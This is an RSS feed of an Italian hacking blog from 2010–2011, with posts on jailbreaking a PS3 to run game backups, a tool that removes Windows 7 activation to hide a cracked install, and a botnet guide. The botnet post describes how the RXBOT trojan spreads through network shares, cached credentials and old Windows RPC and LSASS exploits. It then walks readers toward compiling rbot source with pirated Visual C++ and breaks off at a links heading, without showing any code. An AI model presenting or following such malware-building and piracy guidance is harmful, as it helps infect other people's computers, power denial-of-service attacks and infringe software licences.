<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>kacker1one&#039;s Weblog</title>
	<atom:link href="http://ago1980.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://ago1980.wordpress.com</link>
	<description>.....Hacking, MSN, Guide e tanto altro….</description>
	<lastBuildDate>Fri, 27 May 2011 17:03:09 +0000</lastBuildDate>
	<language>it</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='ago1980.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>kacker1one&#039;s Weblog</title>
		<link>http://ago1980.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://ago1980.wordpress.com/osd.xml" title="kacker1one&#039;s Weblog" />
	<atom:link rel='hub' href='http://ago1980.wordpress.com/?pushpress=hub'/>
		<item>
		<title>GUIDA MODIFICA PS3</title>
		<link>http://ago1980.wordpress.com/2010/11/04/guida-modifica-ps3/</link>
		<comments>http://ago1980.wordpress.com/2010/11/04/guida-modifica-ps3/#comments</comments>
		<pubDate>Thu, 04 Nov 2010 13:57:35 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[modifica psp3]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=745</guid>
		<description><![CDATA[:: Cosa è il PS-Jailbreak? Il PS-Jailbreak è un piccolo dispositivo (dongle) da collegare via USB alla PlayStation 3 che “trasforma” la console in una sorta di unità di debug (Dev-Mode) utilizzata dagli sviluppatori per testare i propri lavori: in pratica sulle normali PS3 Retail viene reso possibile l’esecuzione di codice non certificato come il [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=745&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>:: Cosa è il PS-Jailbreak?<br />
Il PS-Jailbreak è un piccolo dispositivo (dongle) da collegare via USB alla PlayStation 3 che “trasforma” la console in una sorta di unità di debug (Dev-Mode) utilizzata dagli sviluppatori per testare i propri lavori: in pratica sulle normali PS3 Retail viene reso possibile l’esecuzione di codice non certificato come il “Backup Manager”.<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreak1.jpg" alt="" /><br />
.:: Cosa è il Backup Manager?<br />
Il Backup Manager è una applicazione sviluppata dallo stesso team del PS-Jailbreak che permette di riversare il contenuto del supporto ottico DVD/BRD-Game sull&#8217;Hard Disk interno o su qualsiasi dispositivo di archiviazione collegato via USB alla console. Dallo stesso programma è inoltre possibile avviare le copie di backup dei giochi, precedentemente create, direttamente dall&#8217;HDD interno e/o esterno della PS3.</p>
<p>.:: Caratteristiche del PS-Jailbreak:<br />
• Il PS-Jailbreak è una soluzione USB plug and play che si installa in un secondo e che non comporta l&#8217;invalidazione della garanzia.<br />
• Facile da installare e utilizzare grazie ad una interfaccia grafica che guida l&#8217;utente passo-passo.<br />
• Compatibile con tutte le versioni/revisioni/regioni della PS3 FAT e SLIM (USA, JAP, PAL e KOREA).<br />
• il PS-Jailbreak disabilita la forzatura dell&#8217;aggiornamento firmware per l&#8217;avvio degli ultimissimi titoli videoludici.<br />
• Supporta i giochi PS3 ma non permette l&#8217;avvio dei backups dei blue-ray video, dvd video e giochi PS1/PS2.<br />
• Avvio dei backup dei giochi direttamente dall&#8217;HDD interno e/o esterno ed avvio diretto della GUI.<br />
• Diminuzione dei tempi di caricamento dato che la velocità di lettura dagli HDD è maggiore (circa 2x) rispetto al lettore blue-ray. Questo elimina lags e glitches durante il gameplay.<br />
• Consente di caricare applicazioni, backup di giochi commerciali e giochi homebrew da qualsiasi HDD/Flash USB collegato alla PS3.</p>
<p>.:: REQUISITI:<br />
- PS3 con firmware 3.41<br />
- Dongle PS-Jailbreak<br />
- Backup Manager [link a breve] da copiare su qualsiasi dispositivo di archiviazione USB esterno collegato alla PS3 e formattato in FAT32.<br />
- Hard Disk Esterno da collegare via USB alla PS3 (Opzionale)</p>
<p>.:: Preparazione della console e funzionamento del dongle:<br />
- Assicurarsi che il lettore blue-ray della PS3 non contenga alcun disco.<br />
- E&#8217; necessario inserire il dongle PS-Jailbreak a PS3 spenta, quindi, a seconda della versione della console, sarà necessario:</p>
<p>Playstation 3 FAT: Spegnere la console utilizzando lo switch posteriore.<br />
Playstation 3 SLIM: Scollegare il cavo di alimentazione dal retro della console.</p>
<p>- Scollegare eventuali periferiche USB e collegare a qualsiasi porta USB il dongle PS-Jailbreak.</p>
<p>- Premere il pulsante di accensione [POWER] della console premendo contemporaneamente per qualche secondo il tasto [EJECT].</p>
<p>Il dongle verra inizializzato e per circa 10 secondi resteranno accesi i 2 LED (rosso/verde):<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutotestled.jpg" alt="" /><br />
successivamete resterà acceso solo il LED che ci informa sullo stato di funzionamento.</p>
<p>Si possono verificare 2 situazioni:</p>
<p>- Led rosso acceso -<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutoredled.jpg" alt="" /><br />
il PS-Jailbreak non è stato caricato correttamente, generalmente questo accade quando non viene premuto adeguatamente il pulsante di espulsione del lettore [EJECT] o se è presente un disco nel lettore blue-ray della PS3.<br />
Per risolvere il problema basta ripetere la procedura da capo prestando maggiore attenzione.</p>
<p>- Led verde acceso -<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutogreenled.jpg" alt="" /></p>
<p>il PS-Jailbreak funziona correttamente.</p>
<p>- Collegare alla PS3 la periferica di archiviazione esterna USB contenente il &#8220;Backup Manager&#8221;</p>
<p>- Dal menu gioco della dashboard, aprire la cartella INSTALL PACKAGE FILES<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller.jpg" alt="" /><br />
- Posizionarsi sull&#8217;icona manager.pkg<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller2.jpg" alt="" /><br />
- Premere il tasto X per avviare il processo di installazione dell&#8217;applicazione.<br />
Il processo durerà pochi secondi al termine del quale comparirà nel menu Gioco della dashboard l&#8217;applicazione &#8220;Backup Manager&#8221;:<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller3.jpg" alt="" /><br />
- Adesso, se non volete riversate il contenuto del Disco Gioco sull&#8217;hard disk interno della PS3, potete collegarne uno esterno ad una qualsiasi porta USB libera.</p>
<p>.:: Informazioni Utili:<br />
• Il dispositivo funziona correttamente e senza problemi apparenti. Si devono ancora effettuare dei test approfonditi per rilevare eventuali limitazioni.<br />
• Il firmware installato sulla PS3 deve essere il 3.41 perché i files del PS-Jailbreak sono stati ottimizzati per questa specifica versione di software di sistema. Potrebbe però funzionare anche su versioni firmware inferiori e/o superiori.<br />
• Per la corretta attivazione/inizializzazione del PS-Jailbreak è necessario inserire il dongle a console spenta.<br />
• Per la corretta attivazione/inizializzazione del PS-Jailbreak è necessario non aver alcun disco inserito nel lettore blue-ray della console.<br />
• Per evitare danni alla macchina e al dongle è vivamente consigliato estrarre il PS-Jailbreak a console completamente spenta.<br />
• L&#8217;hard disk della PS3 tende a surriscaldarsi quindi si consiglia di usare Hard disk esterni e/o chiavette USB.<br />
• Anche se il Backup Manager è installato nella console è necessario che il dongle sia collegato e attivato correttamente altrimenti non si è in grado di eseguire le applicazioni non certificate come il Backup Manager.<br />
• Rimuovendo il PS-Jailbreak dalla console non è più possibile caricare i backup, quindi è necessario ripetere il processo di attivazione/inizializzazione del dongle da zero. Backup Manager e dongle devono lavorare assieme.<br />
• Se si avvia la console senza il PS-Jailbreak attivato correttamente (LED rosso) o senza collegarlo alla console, il programma &#8220;Backup Manager&#8221; non funzionerà restituendo l&#8217;errore 80029519.<br />
• Il tempo impiegato per creare il backup varia da gioco a gioco. Per copiare i dati di &#8220;God of War 3&#8243; sull&#8217;HDD interno della console ci sono voluti circa 90 minuti mentre per &#8220;Red Dead Redemption&#8221; ne sono bastati 40.<br />
• Se si esegue un backup da Gestione backup, non è possibile applicare le patch disponibili per il gioco (errore 80029567), ma se queste sono già state installate non c&#8217;è nessun problema.<br />
• A causa della limitazione del FileSystem FAT32 i giochi che contengono files di grandezza superiore ai 4GB non possono essere avviati col PS-Jailbreak. &#8220;Red Dead Redemption&#8221; è uno di questi.<br />
• Il backup di un gioco è costituito da una cartella principale riportante l&#8217;ID-GAME del gioco nella quale sono contenuti i file dati. E&#8217; possibile esplorare il contenuto del backup direttamente dal PC.<br />
• I backup creati col Backup Manager su una console possono essere eseguiti su qualsiasi altra console dotata di PS-Jailbreak.<br />
• La modalità online dei giochi, allo stato attuale, funziona senza problemi.</p>
<p>.:: Creazione del backup del gioco:<br />
Una volta avviato il Backup Manager dalla dashboard della PS3 comparirà il menu principale del programma.<br />
La prima cosa da fare è inserire il disco gioco, di cui si vuole fare il backup, nel lettore della console.</p>
<p>- Selezionare l&#8217;icona di anteprima visualizzata:<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutomaimenu1.jpg" alt="" /><br />
- Premere il tasto O per iniziare il processo di backup del gioco.<br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutomainmenubackup.jpg" alt="" /><br />
E&#8217; possibile selezionare la destinazione del backup scegliendo anche se copiarlo sull&#8217;hard disk interno della PS3 oppure in una periferica di archiviazione USB esterna.<br />
E&#8217; possibile eliminare la copia di backup gioco posizionandosi sulla relativa icona e cliccando il tasto<img src="http://www.ps3-ita.com/news_images/tastotriangolo.png" alt="" /><br />
:: Avvio del backup del gioco:<br />
Una volta eseguito il backup per avviarlo, si dovrà:</p>
<p>- Avere inserito un disco gioco qualsiasi nel lettore della PS3. Questo è necessario per il mounting virtuale del supporto e per emulare il processo di caricamento.</p>
<p>- Posizionarsi sull&#8217;icona del gioco e premere il tasto<img src="http://www.ps3-ita.com/news_images/tastocroce.png" alt="" /><br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutomainmenu2.jpg" alt="" /><br />
Si uscirà dal programma e si ritornerà automaticamente sulla dashboard della PS3.</p>
<p>- Dal menu Gioco basterà posizionarsi sull&#8217;icona del disco che cambierà in quella del gioco selezionato e premere il tasto<img src="http://www.ps3-ita.com/news_images/tastocroce.png" alt="" /><br />
<img src="http://www.ps3-ita.com/news_images/psjailbreaktutofinaldesination.jpg" alt="" /><br />
Buon divertimento!<br />
<a href="http://download.gogsoftware.com/UploadFiles/PS3UPDAT.PUP">PS3 Firmware V3.41</a><br />
<a href="http://download.gogsoftware.com/UploadFiles/Open%20Manager1161b.pkg"><br />
Open Manager 1.161.pkg(2010.10.22)</a><br />
FONTE:www.ps3-ita</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/745/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/745/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/745/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=745&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/11/04/guida-modifica-ps3/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreak1.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutotestled.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutoredled.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutogreenled.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller2.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutoxmbinstaller3.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutomaimenu1.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutomainmenubackup.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/tastotriangolo.png" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/tastocroce.png" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutomainmenu2.jpg" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/tastocroce.png" medium="image" />

		<media:content url="http://www.ps3-ita.com/news_images/psjailbreaktutofinaldesination.jpg" medium="image" />
	</item>
		<item>
		<title>Forum online..</title>
		<link>http://ago1980.wordpress.com/2010/05/30/forum-online/</link>
		<comments>http://ago1980.wordpress.com/2010/05/30/forum-online/#comments</comments>
		<pubDate>Sun, 30 May 2010 16:41:33 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Forum online]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=736</guid>
		<description><![CDATA[Salve a tutti ho aperto un forum che potete raggiungere QUA&#8217; scrivetevi in tanti e facciamo crescere il forum&#8230;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=736&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://kacker1one.altervista.org/" target="_blank"><img class="aligncenter" src="http://i50.tinypic.com/140jihj.gif" alt="" width="334" height="57" /></a></p>
<p>Salve a tutti ho aperto un forum che potete raggiungere</p>
<p><a href="http://kacker1one.altervista.org/" target="_blank">QUA&#8217;</a> scrivetevi in tanti e facciamo crescere il forum&#8230;</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/736/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/736/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/736/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=736&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/05/30/forum-online/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>

		<media:content url="http://i50.tinypic.com/140jihj.gif" medium="image" />
	</item>
		<item>
		<title>Rimuovere completamente il WAT</title>
		<link>http://ago1980.wordpress.com/2010/05/28/rimuovere-completamente-il-wat/</link>
		<comments>http://ago1980.wordpress.com/2010/05/28/rimuovere-completamente-il-wat/#comments</comments>
		<pubDate>Fri, 28 May 2010 14:27:49 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[Rimuovere completamente il WAT]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=731</guid>
		<description><![CDATA[Volete craccare il vostro sistema operativo windows 7? Volete eliminare completamente il WAT (windows7 Activation Tecnology )? Ecco cosa fare. Se non volete rendere il vostro Windows 7 genuino ma direttamente eliminare il WAT, eliminando alla radice il problema, oppure siete stati colti impreparati dall&#8217;aggiornamento di Windows7  KB971033, che è in grado di rilevare le [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=731&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows_pir.jpg"><img title="windows_pir" src="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows_pir.jpg" alt="" width="340" height="340" /></a></p>
<p>Volete craccare il vostro sistema operativo windows 7?  Volete eliminare completamente il WAT (windows7 Activation Tecnology )?  Ecco cosa fare.</p>
<p>Se non volete rendere il vostro Windows 7  genuino ma direttamente eliminare il WAT, eliminando alla radice il  problema, oppure siete stati colti impreparati dall&#8217;aggiornamento di Windows7  KB971033, che è in grado di rilevare le versioni di  Windoes 7  &#8220;craccate&#8221;, vi consiglio di utilizzare questo programmino.</p>
<p><a href="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows7_pirate_02_removewat.png"><img title="windows7_pirate_02_removewat" src="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows7_pirate_02_removewat.png" alt="" width="305" height="307" /></a></p>
<p>L&#8217;interfaccia è elementare. Non dovete fare altro che cliccare su &#8220;<strong>Remove  WAT</strong>&#8221; e aspettare. Alla fine si riavvierà il sistema. Al  riavvio avrete il vostro windows7  senza WAT.</p>
<p>Personalmente l&#8217;ho trovato molto utile per rimediare ai problemi  dell&#8217;aggiornamento KB971033 che era riuscito a rilevare la &#8220;crack&#8221; che  c&#8217;era nel mio sistema.</p>
<p><a href="http://ul.to/d4qx2q" target="_blank">DOWNLOAD QUA&#8217;</a></p>
<p>fonte: hackerz</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/ago1980.wordpress.com/731/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/ago1980.wordpress.com/731/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/ago1980.wordpress.com/731/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=731&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://ago1980.wordpress.com/2010/05/28/rimuovere-completamente-il-wat/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/916910d22d67e1d6d8fe1099d7e45a2f?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">ago1980</media:title>
		</media:content>

		<media:content url="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows_pir.jpg" medium="image">
			<media:title type="html">windows_pir</media:title>
		</media:content>

		<media:content url="http://www.r3m3mb3r-hackerz.com/wp-content/uploads/2010/05/windows7_pirate_02_removewat.png" medium="image">
			<media:title type="html">windows7_pirate_02_removewat</media:title>
		</media:content>
	</item>
		<item>
		<title>RXBOT (botnet)</title>
		<link>http://ago1980.wordpress.com/2010/05/13/rxbot-botnet/</link>
		<comments>http://ago1980.wordpress.com/2010/05/13/rxbot-botnet/#comments</comments>
		<pubDate>Thu, 13 May 2010 22:34:07 +0000</pubDate>
		<dc:creator>ago1980</dc:creator>
				<category><![CDATA[BOTNET]]></category>

		<guid isPermaLink="false">http://ago1980.wordpress.com/?p=725</guid>
		<description><![CDATA[&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; BENVENUTI IN QUESTA ULTIMA MIA GUIDA DOVE VI SPIEGHERO&#8217; &#8230; NEI PASSI PIU SEMPLICI POSSIBILI COSA SIA UN RBOT, E QUALI CARATTERISTICHE LO COMBINANO&#8230;ANCHE PERCHE&#8217; QUESTO FENOMENO SI STA ESPANDENDO SEMPRE DI PIU ED E&#8217; FRUTTO DI POTENTI ATTACCHI DENIAL OF SERVICE GRAZIE A VARIE MACCHINE LINKATE TRA LORO&#8230;QUESTO MI FA RICORDARE MOLTO I [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=ago1980.wordpress.com&amp;blog=2504298&amp;post=725&amp;subd=ago1980&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
BENVENUTI IN QUESTA ULTIMA MIA GUIDA DOVE VI SPIEGHERO&#8217; &#8230; NEI PASSI PIU SEMPLICI POSSIBILI<br />
COSA SIA UN RBOT, E QUALI CARATTERISTICHE LO COMBINANO&#8230;ANCHE PERCHE&#8217; QUESTO FENOMENO SI STA<br />
ESPANDENDO SEMPRE DI PIU ED E&#8217; FRUTTO DI POTENTI ATTACCHI DENIAL OF SERVICE GRAZIE A VARIE<br />
MACCHINE LINKATE TRA LORO&#8230;QUESTO MI FA RICORDARE MOLTO I CLIENT PER DDOS PER LINUX..<br />
TIPO IL TRIBE FLOOD =) BUCAVI IL SERVER , TI LOGGAVI DENTRO , MONTAVI ROOTKIT , APRIVI PORTA<br />
E LINKAVI COME MASTER AL CLIENT E QUESTO VIA DICENDO CON CENTINAIA DI UNIX ANCHE DETTE SHELL<br />
MA QUESTA E&#8217; UN ALTRA STORIA&#8230; ADESSO DOBBIAMO TRATTARE DI RBOT E NON DI CLIENT PER LINUX</p>
<p>{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}</p>
<p>APPROFONDIMENTI SULL&#8217;RB0T</p>
<p>{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}</p>
<p>COSA E&#8217; UN RXB0T??? Sinceramente il vero nome attribuito a questo programma e&#8217; rb0t perche&#8217; oltre all&#8217;rx<br />
ce ne sono altri tipo come URX,CRX,VRX,RX ecc ecc&#8230; Ogniuno con tale scopo.. Chi scanna,chi sniffa,chi dossa<br />
ecc ecc!Questo trojan ha facile propagazione in tutta la rete locale.. e puo&#8217; infettare qualsiasi piattaforma<br />
windows dalla 95 alla XP&#8230; Per vista nn so se sia attaccabile e&#8217; tutto da controllare..i suoi effetti sono<br />
Duplicarsi all&#8217;infinito,modificare il registro di sistema, sfruttare molte vulnerabilita&#8217; del sistema operativo<br />
Sottrarre informazioni e avere pieno accesso del computer tramite una console guidata da IRC dall&#8217;attacker&#8230;<br />
Fa una copia di se stesso utilizzando un nome file dalla lista a %­SYSDIR% Utilizzando uno dei seguenti nomi:<br />
• logon.exe<br />
• firewall.exe<br />
• algs.exe<br />
• explorer.exe<br />
• Isass.exe<br />
• iexplore.exe<br />
• spoolsvc.exe<br />
• winamp.exe<br />
• csrs.exe<br />
e subito dopo Cancella la copia di se stesso eseguita inizialmente.<br />
Per assicurarsi la propria propagazione, il malware tenta di connettersi ad altre macchine come descritto qui sotto:<br />
Fa più copie di se stesso nelle seguenti condivisioni di rete:<br />
• c$windows<br />
• c$winnt<br />
• d$shared<br />
• e$shared<br />
• print$<br />
• IPC$<br />
• admin$<br />
• admin$system32<br />
Utilizza le seguenti informazioni di login per aprirsi l&#8217;accesso alla macchina remota,<br />
Nomi Utente e Password presenti nella cache.<br />
Ma quali exploit sfrutta questo trojan????? eccovi la lista =)</p>
<p>Sfrutta la seguente vulnerabilità:</p>
<p>– MS03-007 (Unchecked Buffer in Windows Component)<br />
– MS03-026 (Buffer Overrun in RPC Interface)<br />
– MS04-007 (ASN.1 Vulnerability)<br />
– MS04-011 (LSASS Vulnerability)<br />
– MS05-039 (Vulnerability in Plug and Play)</p>
<p>In piu&#8217; Crea degli indirizzi IP casuali mentre mantiene i primi due ottetti dal proprio indirizzo. In seguito prova a stabilire<br />
una connessione con gli indirizzi creati.</p>
<p>*Linguaggio di programmazione:<br />
Il malware è stato scritto in MS Visual C++.<br />
Per complicarne l&#8217;individuazione e ridurre la dimensione del file, viene compresso con il seguente software di compressione:<br />
• AS Protect 1.2</p>
<p>{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}</p>
<p>ViSUAL C++</p>
<p>{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}</p>
<p>Il visual c++ e&#8217; un programma per scrivere programmi in c&#8230; questo molto utilizzato su piattaforme windows&#8230;<br />
Questo e&#8217; il programma ke andremo ad utilizzare per compilare il nostro src dell&#8217;rb0t.. reperibile da qualsiasi<br />
programma P2P come ad ad esempio TORRENT oppure il nostro amato EMULE&#8230; basta scrivere<br />
Visual C+ 6.0 ENTERPRISE sono circa 600mb a CD ne dovrebbero essere un paio 6 credo&#8230; ma nn ne sono sicuro =)</p>
<p>{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}</p>
<p>COMPILAZIONE</p>
<p>{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}</p>
<p>Finalmente direte voi! dopo tanto rompimento di balle sulla spiegazione di questo virus siamo riusciti<br />
finalmente ad arrivare alla compilazione! Quello che a tutti noi interessa&#8230; bene allora senza<br />
altri intralci iniziamo subito! ^^</p>
<p>Allora scarichiamo o procuriamoci questi programmi&#8230;</p>
<p>-Visual C++ ENTERPRISE ( programma fondamentale per la compilazione dell rbot )<br />
-Librerie SDK ( librerie fondamentali per la compilazione )<br />
-Service pack 6 ( aggiornamento al visual c++ .. per intenderci piu aggiornato e&#8217; meglio e&#8217;! )<br />
-Src Rb0t ( Un source qualsiasi di un rxb0t ,</p>
<p>LINK UTILI&#8230;</p>
